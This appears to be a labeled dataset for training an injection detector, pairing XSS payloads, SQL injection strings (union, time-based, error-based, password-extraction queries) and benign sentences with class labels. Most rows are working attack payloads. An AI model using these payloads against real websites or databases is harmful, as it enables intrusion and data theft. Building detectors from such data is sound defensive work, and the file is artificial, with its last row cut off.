"javascript:alert()//""/*`/*'/*\""/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()><<script>alert()<</script>",1,XSS,391 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 5 ) ) AND 'i' = 'i",2,SQLi,11623 "<summary onmousedown=""alert(1)"">test</summary>",1,XSS,6428 "select * from users where id = 1 or ""{@"" or 1 = 1 -- 1",2,SQLi,17884 ) union select * from information_schema.tables;,2,SQLi,18648 "1"" ) as zbhs where 2017 = 2017 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,10602 "Enter your 4-digit pin, select the ' PIN Services ' option and follow the on-screen instructions.",3,normal,26218 <abbr onpointermove=alert(1)>XSS</abbr>,1,XSS,8115 "1%' ) ) ) union all select null,null,null,null,null,null--",2,SQLi,17400 "<td draggable=""true"" ondragleave=""alert(1)"">test</td>",1,XSS,4999 "1"" ) ) as ylah where 9248 = 9248",2,SQLi,20330 1%' ) ) rlike sleep ( 5 ) and ( ( '%' = ',2,SQLi,19380 "1 ) where 8691 = 8691 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14235 "Complete lists of current British periodicals are included in Mitchell's Newspaper Press Directory, Street's Newspaper Directory, and Willing's Press Guide, and a select list and other information are given in the Literary Year Book.",3,normal,26275 "<tfoot onpaste=""alert(1)"" contenteditable>test</tfoot>",1,XSS,4798 "<cite onkeydown=""alert(1)"" contenteditable>test</cite>",1,XSS,4771 "1"" or elt ( 6272 = 6272,sleep ( 5 ) ) and ""zzca"" = ""zzca",2,SQLi,17701 "1"" ) as yekp where 3049 = 3049 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11089 "<noembed oncopy=""alert(1)"" contenteditable>test</noembed>",1,XSS,4175 "1"" ) where 6821 = 6821 waitfor delay '0:0:5'--",2,SQLi,18943 Expansion of early and late antlerless seasons in select counties.,3,normal,26209 </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera},1,XSS,1909 "<svg draggable=""true"" ondragend=""alert(1)"">test</svg>",1,XSS,4948 ></iframe><script>alert(123)</script>,1,XSS,8563 <style id=x tabindex=1 onfocus=alert(1)></style>,1,XSS,6035 <input onpointermove=alert(1)>XSS</input>,1,XSS,7622 "<style>:target {color: red;}</style><dl id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></dl>",1,XSS,1153 "-9873"" union all select 8020,8020,8020,8020,8020,8020#",2,SQLi,17975 "-3349 ) ) ) union all select 6553,6553#",2,SQLi,19579 Select your assert.,3,normal,24966 48e71%3balert(1)//503466e3,1,XSS,9692 <header onpointerdown=alert(1)>XSS</header>,1,XSS,7109 Owners who select the Heritage will be able to select either a Shadow Black paint job in either gloss or matte finish.,3,normal,25797 "1"" ) as semi where 4260 = 4260",2,SQLi,20570 "<mark onbeforecut=""alert(1)"" contenteditable>test</mark>",1,XSS,4289 <video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus>,1,XSS,2232 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><button id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></button>",1,XSS,176 select case when 7649 = 9297 then 1 else null end--,2,SQLi,18311 <button onSubmit=javascript:alert(1)>,1,XSS,8755 "<bgsound onkeypress=""alert(1)"" contenteditable>test</bgsound>",1,XSS,3410 "<style>@keyframes x{}</style><frame style=""animation-name:x"" onanimationstart=""alert(1)""></frame>",1,XSS,1540 "<xss draggable=""true"" ondragend=""alert(1)"" style=display:block>test</xss>",1,XSS,2294 <SCRIPT SRC=//ha.ckers.org/.j>,1,XSS,9526 "<style>:target {color:red;}</style><br id=x style=""transition:color 1s"" ontransitionend=alert(1)></br>",1,XSS,1365 "<caption oncut=""alert(1)"" contenteditable>test</caption>",1,XSS,4359 -2372' or 1783 = 2656,2,SQLi,21675 "-9569%' ) ) union all select 8405,8405,8405,8405--",2,SQLi,18528 -5432' ) as dndq where 9633 = 9633 order by 1#,2,SQLi,18932 "<style>:target {transform: rotate(180deg);}</style><img id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></img>",1,XSS,682 "1%' ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( '%' = '",2,SQLi,13074 Select dessert first.,3,normal,24424 "<param draggable=""true"" ondragenter=""alert(1)"">test</param>",1,XSS,3666 "1"" ) union all select null,null,null,null,null,null--",2,SQLi,18069 "javascript:""/*'//`//\""//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>",1,XSS,510 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><element id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></element>",1,XSS,168 "1"" or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13713 Select your ponder.,3,normal,24974 "{""id"":null,""name"":""Ekans""}",3,normal,26852 "<embed code=""http://businessinfo.co.uk/labs/xss/xss.swf"" allowscriptaccess=always>?",1,XSS,1916 <input4 onpointerdown=alert(1)>XSS</input4>,1,XSS,7266 "{""id"":null,""name"":""Aardvark""}",3,normal,27133 "{""id"":null,""name"":""best""}",3,normal,27284 "1"" and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""vziz"" = ""vziz",2,SQLi,10752 "<div draggable=""true"" contenteditable>drag me</div><mark ondragover=alert(1) contenteditable>drop here</mark>",1,XSS,1106 "1 ) ) as tuxy where 6855 = 6855 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12091 <frame onfocusout=alert(1) tabindex=1 id=x></frame><input autofocus>,1,XSS,2612 -1344 ) as gqgi where 2545 = 2545 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,9968 `'><script>\xE2\x80\xA8javascript:alert(1)</script>,1,XSS,5312 I'm thinking about where to spend the evening.,3,normal,23856 "1' ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'bgdp' = 'bgdp",2,SQLi,11132 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))",2,SQLi,11180 ‘ or 1 = 1 --,2,SQLi,22170 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><basefont id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></basefont>",1,XSS,154 "1', ( select ( case when ( 6560 = 2813 ) then 1 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual )",2,SQLi,13446 admin' or 1 = 1--,2,SQLi,22094 "<template draggable=""true"" ondragstart=""alert(1)"">test</template>",1,XSS,2834 "{""id"":null,""name"":""name spell""}",3,normal,27477 The Real Estate Select Sector SPDR Fund (XLRE) rose 0.6% while the Utilities Select Sector fund (XLU) gained 0.8%.,3,normal,25389 <b onfocusout=alert(1) tabindex=1 id=x></b><input autofocus>,1,XSS,3553 ) IF (1=1) WAITFOR DELAY '0:0:5'--,2,SQLi,20130 I'm considering where to take a yoga class.,3,normal,23907 "Select ""Uninstall,"" then choose ""Uninstall All"" to confirm the deletion.",3,normal,25671 -3596 ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( 3645 = 3645,2,SQLi,12565 "<del draggable=""true"" ondragenter=""alert(1)"">test</del>",1,XSS,4540 "-8868"" ) where 5681 = 5681 union all select 5681,5681,5681,5681,5681,5681,5681,5681,5681,5681--",2,SQLi,14391 Select your look.,3,normal,24894 -2154%' or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and '%' = ',2,SQLi,10038 "1'+ ( select mcfb where 4050 = 4050 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) ) +'",2,SQLi,12302 Let's explore where the river flows into.,3,normal,23825 1' ) ) as jbcd where 9078 = 9078 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,15112 select case when 3995 = 8680 then 1 else null end--,2,SQLi,18399 "If you want access to the comforts of home, select a campsite that provides what you seek.",3,normal,26047 <summary id=x tabindex=1 onfocus=alert(1)></summary>,1,XSS,5143 "1"" ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ""xmrq"" = ""xmrq",2,SQLi,11838 select pg_sleep ( 5 ) and '%' = ',2,SQLi,20219 "Select the recording option in your toolbar or by using the hotkey, select the area you want to record, and then save the recording as a high-DPI video or an animated GIF.",3,normal,25589 &lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;,1,XSS,3452 1%' union all select null#,2,SQLi,21005 "1 ) as auly where 4146 = 4146 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16613 "1' where 4417 = 4417 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --",2,SQLi,13180 <code onfocusout=alert(1) tabindex=1 id=x></code><input autofocus>,1,XSS,2751 select * from users where id = 1 %$ 1 or 1 = 1 -- 1,2,SQLi,18257 "He had already attained some repute as a critic, which was enhanced when, after travelling in Germany, he delivered as select preacher at Cambridge, four addresses against rationalism, published in 1825 as The State of the Protestant Religion in Germany.",3,normal,26123 select sleep ( 5 ) and ( 'qcsv' = 'qcsv,2,SQLi,19648 "1' ) ) as tfub where 3461 = 3461 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,12731 1 ) ) as qlkf where 6635 = 6635,2,SQLi,20491 "-9634' ) ) ) union all select 4141,4141#",2,SQLi,19517 "1' ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13155 "1'+ ( select thmg where 2546 = 2546 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12275 "1"" ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""vurb"" like ""vurb",2,SQLi,10203 %20or%20x=x,2,SQLi,22352 <input onfocusout=alert(1) id=x><input autofocus>,1,XSS,5812 "<b onbeforecut=""alert(1)"" contenteditable>test</b>",1,XSS,5636 "-4596"" union all select 5761#",2,SQLi,20718 "1' ) ) as sojl where 8710 = 8710 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11604 """) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,19564 "1%"" ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13950 Insert the fresh cartridge into the printer.,3,normal,22960 "Early in the 15th century their residence was fixed at Halle, and about the same time it became the custom to select them from one of the reigning families of Germany, most often from the house of Brandenburg.",3,normal,26222 "<audio controls autoplay ontimeupdate=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,1382 "The case concerned whether Select Comfort violated a 2005 contract that let Sleepy's sell Select Comfort's wood framed ""Personal Preference"" beds, while Select Comfort sold its plastic-and-polymer framed ""Core"" beds in its own stores.",3,normal,25482 "-6000"" ) where 1797 = 1797 union all select 1797,1797,1797,1797,1797,1797,1797,1797--",2,SQLi,14925 "<option onkeydown=""alert(1)"" contenteditable>test</option>",1,XSS,3834 Select the gear icon — this will prompt a window to open.,3,normal,25599 "<h1 onbeforepaste=""alert(1)"" contenteditable>test</h1>",1,XSS,4778 "<applet onpaste=""alert(1)"" contenteditable>test</applet>",1,XSS,4278 <svg id=x tabindex=1 onbeforeactivate=alert(1)></svg>,1,XSS,4960 "{""id"":null,""name"":""put""}",3,normal,27075 Select a travel destination for a vacation.,3,normal,24126 "-9583%"" ) ) union all select 9349,9349,9349,9349,9349,9349,9349--",2,SQLi,16686 <iframe src=http://.rocks/scriptlet.html <,1,XSS,7418 <input onblur=javascript:alert(1) autofocus><input autofocus>,1,XSS,3254 date,3,normal,23200 "1"" union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16697 "1"" and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19483 Select plot.,3,normal,24751 Select the best wedding officiant.,3,normal,24379 Find data where valid.,3,normal,23335 "1'|| ( select 'dpce' from dual where 5261 = 5261 union all select null,null,null,null,null,null--",2,SQLi,14324 "1'|| ( select 'aair' where 9234 = 9234 union all select null,null,null,null#",2,SQLi,15547 "select * from generate_series ( 3086,3086,case when ( 3086 = 3327 ) then 1 else 0 end ) limit 1--",2,SQLi,14294 "1"" ) ) as dshc where 9911 = 9911 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12351 "1'+ ( select 'tyuz' where 3957 = 3957 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) ) +'",2,SQLi,11570 "1 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,15663 "1%"" rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ""%"" = """,2,SQLi,15066 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3# sfup",2,SQLi,14232 <rtc id=x tabindex=1 ondeactivate=alert(1)></rtc><input id=y autofocus>,1,XSS,2470 Select breakfast.,3,normal,24504 1 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) -- saxs,2,SQLi,16678 1' ) waitfor delay '0:0:5',2,SQLi,20984 "1%' ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( '%' = '",2,SQLi,11781 1' ) ) ) rlike ( select ( case when ( 5524 = 9582 ) then 1 else 0x28 end ) ) and ( ( ( 'okoj' like 'okoj,2,SQLi,13893 "1' ) ) and elt ( 4249 = 4249,7259 ) and ( ( 'miir' like 'miir",2,SQLi,17022 �scriptualert(EXSSE)�/scriptu,1,XSS,9586 "<source onmouseleave=""alert(1)"">test</source>",1,XSS,6699 1 ) as vxsh where 4706 = 4706,2,SQLi,20727 <data onblur=alert(1) tabindex=1 id=x></data><input autofocus>,1,XSS,3182 "-8999"" where 2821 = 2821 union all select 2821,2821,2821,2821,2821,2821,2821,2821#",2,SQLi,15113 "1"" or ( select * from ( select ( sleep ( 5 ) ) ) ydpu )",2,SQLi,17830 <thead onpointerup=alert(1)>XSS</thead>,1,XSS,8278 <rt onpointermove=alert(1)>XSS</rt>,1,XSS,9068 "1' ) ) as ewyk where 4828 = 4828 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11054 Select your dream wedding song.,3,normal,24410 <ruby id=x tabindex=1 onbeforeactivate=alert(1)></ruby>,1,XSS,4559 <script\x00>javascript:alert(1)</script>,1,XSS,7815 "1' ) where 6774 = 6774 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12863 "<content onmousemove=""alert(1)"">test</content>",1,XSS,6299 "{""id"":null,""name"":""Gible""}",3,normal,27418 select ( case when ( 8618 = 8706 ) then 8618 else 8618* ( select 8618 from mysql.db ) end ) #,2,SQLi,14558 "{""id"":null,""name"":""Serperior""}",3,normal,27210 "LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>",1,XSS,1134 -9688%' ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( '%' = ',2,SQLi,10666 "1"" ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""dksc"" = ""dksc",2,SQLi,10545 Where's the missing puzzle piece?,3,normal,22668 I want to choose a theme for the party.,3,normal,23919 "Cyril and Augustine differ, as we should expect, in the doctrines which they select for emphasis, but they both agree in requiring a knowledge of sound doctrine on the part of the candidates.",3,normal,26256 "<IMG SRC=x onbeforeprint=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2873 "1 ) where 5333 = 5333 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13020 "1"" ) or sleep ( 5 ) and ( ""fiag"" like ""fiag",2,SQLi,19188 "<style>@keyframes x{}</style><h1 style=""animation-name:x"" onanimationend=""alert(1)""></h1>",1,XSS,1774 1' ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'mmow' = 'mmow,2,SQLi,10617 1 where 4641 = 4641,2,SQLi,21935 "<video onloadeddata=alert(1)><source src=""validvideo.mp4"" type=""video/mp4""></video>",1,XSS,1915 1'|| ( select 'zeet' from dual where 9567 = 9567 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,14236 Select accept.,3,normal,24581 <svg><head onload=alert(1)></head>,1,XSS,9259 1' in boolean mode ) order by 1--,2,SQLi,20194 "1' where 8277 = 8277 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,12626 Where's the psychotherapist?,3,normal,23668 "1'+ ( select rqcw where 9002 = 9002 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14212 "select count ( * ) from generate_series ( 1,5000000 ) and ( ""kngx"" like ""kngx",2,SQLi,15441 select pg_sleep ( 5 ) and ( ( ( 'mgbm' like 'mgbm,2,SQLi,18569 "1%"" ) ) union all select null,null,null--",2,SQLi,19416 "<div draggable=""true"" contenteditable>drag me</div><form ondragover=alert(1) contenteditable>drop here</form>",1,XSS,1107 Where's the chateau?,3,normal,23573 "-2987"" ) as iyob where 7827 = 7827 or ( 8459 = 8459 ) *4906--",2,SQLi,17100 Select your favorite artist.,3,normal,24312 "<ol draggable=""true"" ondragstart=""alert(1)"">test</ol>",1,XSS,4958 "<IMG SRC=# onmouseover=""alert('xxs')"">",1,XSS,8310 "{""id"":null,""firstName"":""Zi"",""lastName"":""Jian"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26837 "make_set ( 5679 = 9769,9769 )",2,SQLi,20780 "1"" ) as duvm where 6190 = 6190 order by 1--",2,SQLi,19173 1' ) ) as tcby where 5213 = 5213,2,SQLi,20337 Select brandy.,3,normal,24522 "<hgroup onkeypress=""alert(1)"" contenteditable>test</hgroup>",1,XSS,3698 <video onpointerdown=alert(1)>XSS</video>,1,XSS,7781 Group data where necessary.,3,normal,23330 "<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>",1,XSS,630 "<a href=""\x1Cjavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2453 Or remain a niche market available only in select cities?,3,normal,25810 "1 or benchmark(10000000,MD5(1))#",2,SQLi,20232 In the United States the same question was considered in 1896 by a Joint Select Committee on the use of alcohol in the manufactures and arts.,3,normal,25994 "{""id"":null,""name"":""Psyduck""}",3,normal,27569 "1"" ) where 1300 = 1300 order by 1#",2,SQLi,20151 <input id=x tabindex=1 onbeforedeactivate=alert(1)></input><input autofocus>,1,XSS,2178 "-4945 or make_set ( 9354 = 9354,7185 )",2,SQLi,19726 Where's the primary key?,3,normal,23384 "<IMG SRC=x onvolumechange=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2789 "1"" ) ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( ""wvlb"" like ""wvlb",2,SQLi,12321 "<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script",1,XSS,1198 1 ) as crsd where 5271 = 5271 waitfor delay '0:0:5'--,2,SQLi,18084 1' ) ) as myws where 5274 = 5274,2,SQLi,20355 "<title onmouseout=""alert(1)"">test</title>",1,XSS,7621 "<dfn draggable=""true"" ondragenter=""alert(1)"">test</dfn>",1,XSS,4446 "1 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) # myqr",2,SQLi,11152 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( 'hxcq' = 'hxcq",2,SQLi,15538 "<;IMG SRC="";jav&;#x0D;ascript:alert(';XSS';);"";>;",1,XSS,5724 Select the best ingredients for baking.,3,normal,24249 "1"" ) where 7513 = 7513 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10719 To unlock nokia mobile phones you should select the operator company where you bought your cell phone or where your cell phone is locked.,3,normal,25257 -2022 ) ) ) or 6812 = 3516 and ( ( ( 3896 = 3896,2,SQLi,18777 "<br draggable=""true"" ondragleave=""alert(1)"">test</br>",1,XSS,4969 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) #",2,SQLi,18625 "1%"" ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""%"" = """,2,SQLi,10434 1'|| ( select 'qstz' where 6835 = 6835,2,SQLi,19734 "<area draggable=""true"" ondragstart=""alert(1)"">test</area>",1,XSS,4011 "-3699%' ) ) ) union all select 8241,8241,8241,8241,8241,8241,8241,8241,8241#",2,SQLi,15539 "<command onkeydown=""alert(1)"" contenteditable>test</command>",1,XSS,3585 "{""id"":null,""firstName"":""Wong"",""lastName"":""Qun Jie"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27321 select * from users where id = 1 or \<$ or 1 = 1 -- 1,2,SQLi,18044 "-8349 ) union all select 8126,8126#",2,SQLi,20027 Create a unique painting.,3,normal,22643 "1"" ) as dezr where 2145 = 2145 or sleep ( 5 ) #",2,SQLi,18876 "1%' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( '%' = '",2,SQLi,12448 "<ruby onmouseout=""alert(1)"">test</ruby>",1,XSS,8280 Select your favorite book.,3,normal,22662 &&SLEEP(5)#,2,SQLi,22391 "<style onbeforecopy=""alert(1)"" contenteditable>test</style>",1,XSS,3669 "1%"" ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ""%"" = """,2,SQLi,12498 RLIKE SLEEP(5)-- 1337,2,SQLi,21573 "1' ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 'xfmq' = 'xfmq",2,SQLi,12806 "1%' ) ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( '%' = '",2,SQLi,10235 <form><input oninvalid=alert(1) required><input type=submit>,1,XSS,3425 -7565%' ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( '%' = ',2,SQLi,10741 <samp onpointerdown=alert(1)>XSS</samp>,1,XSS,8202 select * from users where id = 1. or 1 = 1 -- 1,2,SQLi,18817 1%' ) ) and sleep ( 5 ) and ( ( '%' = ',2,SQLi,19620 "The service, called Swiggy Go, is currently limited to select cities.",3,normal,25379 "<ruby oncopy=""alert(1)"" contenteditable>test</ruby>",1,XSS,5368 "select * from users where id = 1 or @#""; = 1 or 1 = 1 -- 1",2,SQLi,17337 Filter emails.,3,normal,23019 <ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus>,1,XSS,2897 1'|| ( select 'jslz' where 8405 = 8405 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) ) ||',2,SQLi,14146 "<style>:target {color:red;}</style><sub id=x style=""transition:color 1s"" ontransitionend=alert(1)></sub>",1,XSS,1298 "<table draggable=""true"" ondragleave=""alert(1)"">test</table>",1,XSS,3644 Where's the RV park?,3,normal,23557 "Why not select some Christmas dinnerware for baby, instead?",3,normal,25127 "{""id"":null,""firstName"":""Huang Soon"",""lastName"":""Thyng"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27203 "{""id"":null,""firstName"":""Ong"",""lastName"":""Zhi Rong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26947 <frameset onload=javascript:alert(1)>,1,XSS,8551 1 ) rlike sleep ( 5 ),2,SQLi,21673 "<ol draggable=""true"" ondragend=""alert(1)"">test</ol>",1,XSS,5453 -1638' or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'xkne' = 'xkne,2,SQLi,10709 "select * from users where id = '1' or $ . = 1 union select 1,@@VERSION -- 1'",2,SQLi,15473 "<form onmousemove=""alert(1)"">test</form>",1,XSS,7869 "1%"" ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19151 "1"" where 5845 = 5845 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) 